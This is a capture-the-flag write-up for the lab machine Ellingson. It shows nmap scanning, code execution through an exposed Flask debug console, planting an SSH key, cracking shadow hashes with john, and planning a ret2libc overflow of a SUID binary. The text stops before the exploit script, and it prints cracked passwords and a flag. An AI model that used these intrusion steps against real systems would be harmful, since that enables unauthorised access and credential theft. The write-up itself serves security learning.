As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Fri May 12 07:25:20 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.139
Nmap scan report for 10.10.10.139
Host is up (0.056s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Fri May 12 07:25:47 2023 -- 1 IP address (1 host up) scanned in 26.49 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,60080 10.10.10.139 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Fri May 12 07:30:15 2023 as: nmap -sCV -p22,80 -Pn -n -oN targeted 10.10.10.139
Nmap scan report for 10.10.10.139
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49e8f12a8062de7e0240a1f430d288a6 (RSA)
| 256 c802cfa0f2d85d4f7dc7660b4d5d0bdf (ECDSA)
|_ 256 a5a995f54af4aef8b63792b89a2ab466 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-title: Ellingson Mineral Corp
|_Requested resource was http://10.10.10.139/index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 12 07:30:26 2023 -- 1 IP address (1 host up) scanned in 11.92 seconds
The website consists of a landing page with some articles.
The third article says that the most common passwords are Love, Secret, Sex and God. This might be helpful later.
Exploitation
If we try to access an article that doesn't exist, we'll see a Flask error.
http://10.10.10.139/articles/4
If we hover over one of the errors, we'll see a console icon, which gives us a python console if pressed. We could see that the server is running as hal.
print(os.popen("whoami").read())
There are some home directories inside /home, and the hal directory has the .ssh folder inside.
There is one id_rsa key, but it looks like it is encrypted.
We could still create a pair of SSH keys in our machine, and put our id_rsa.pub key inside the authorized_keys of the server.
Then, put it in the authorized_keys of the server.
Now we can access the machine via SSH as hal, without the need of any password.
ssh hal@10.10.10.139
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri May 12 22:05:31 UTC 2023
System load: 0.0 Processes: 166
Usage of /: 69.1% of 4.31GB Users logged in: 1
Memory usage: 28% IP address for ens160: 10.10.10.139
Swap usage: 0%
=> There is 1 zombie process.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
159 packages can be updated.
78 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri May 12 18:43:19 2023 from 10.10.14.3
hal@ellingson:~$ whoami
hal
Copy the /etc/passwd into the passwd file, and the /var/backups/shadow.bak into the shadow file. Now, let's try to break those hashes. As we saw earlier, the most common passwords are Love, Secret, Sex and God. We could get all the passwords that contain any of these words from the rockyou.txt dictionary, and use that wordlist to break the hashes.
Now, use the unshadow tool to get the hashes needed to crack them with john.
unshadow passwd shadow > unshadow
Then, try to break the hashes with this new wordlist.
john -w=passwords unshadow
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates left, minimum 8 needed for performance.
iamgod$08 (margo)
password123 (theplague)
2g 0:00:00:00 DONE (2023-05-12 22:17) 66.66g/s 100.0p/s 400.0c/s 400.0C/s password123..test
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The password for theplague doesn't seem to be valid. But the password for margo is valid. Once we become the margo user, we'll be able to grab the user flag.
su margo
Password: iamgod$08
margo@ellingson:/home/hal$ cd
margo@ellingson:~$ cat user.txt
2c087c89ecdda46fefc6b7a327b75613
There is one binary called garbage with SUID permissions.
find / -perm /4000 2>/dev/null
...
/usr/bin/garbage
...
It asks for a password.
/usr/bin/garbage
Enter access password: test
access denied.
If we try to enter a bunch of a characters, we'll see the segmentation fault, which means that the binary is vulnerable to buffer overflow.
/usr/bin/garbage
Enter access password: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
access denied.
Segmentation fault (core dumped)
As we can see in the victim machine, ASLR is enabled, which means that the memory address of the binary is dynamic.
cat /proc/sys/kernel/randomize_va_space
2
The binary is using the /lib/x86_64-linux-gnu/libc.so.6 libc library. Let's transfer the binary and the libc library to our local machine.
We are ready to exploit the buffer overflow. Let's run the binary with gdb.
gdb ./garbage
GNU gdb (Debian 13.1-2) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
GEF for linux ready, type `gef' to start, `gef config' to configure
90 commands loaded and 5 functions added for GDB 13.1 in 0.00ms using Python engine 3.11
Reading symbols from ./garbage...
(No debugging symbols found in ./garbage)
gefâ¤
Let's run the binary with the -i argument, and add a bunch of A characters next to allow, so we can crash the program.
We have to find the offset, or number or A characters, to reach the RSP register. To do it, let's create a pattern.
gef⤠pattern create 200
[+] Generating a pattern of 200 bytes (n=8)
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
[+] Saved as '$_gef0'
Now, run the program again, and put the pattern with the allow argument.
gef⤠r -i
Enter access password: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
Now, we'll see how the RSP register is full of B and C characters.
gef⤠r -i
Enter access password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC
If we check the memory protections of the binary, we'll see that only NX is enabled.
gef⤠checksec
[+] checksec for '/home/alfa8sa/HTB/machines/ellingson/garbage'
Canary : â
NX : â
PIE : â
Fortify : â
RelRO : Partial
Here is the strategy. First, we need to leak and calculate the address of the libc library. We can do this using the PUTS function, and giving __libc_start_main as an argument, which we could load into rdi with a gadget.
Once we know the real address of libc, we can get everything else. As we want a shell as root, we will need to set the UID of the shell to 0. To do it, we need to load a 0 into rdi and then call the setuid function.
Finally, we need to spawn a shell. Same thing as before, first we load the /bin/sh string into rdi, then we call the system function.
Here is a python script that automates all this process using the pwntools library.
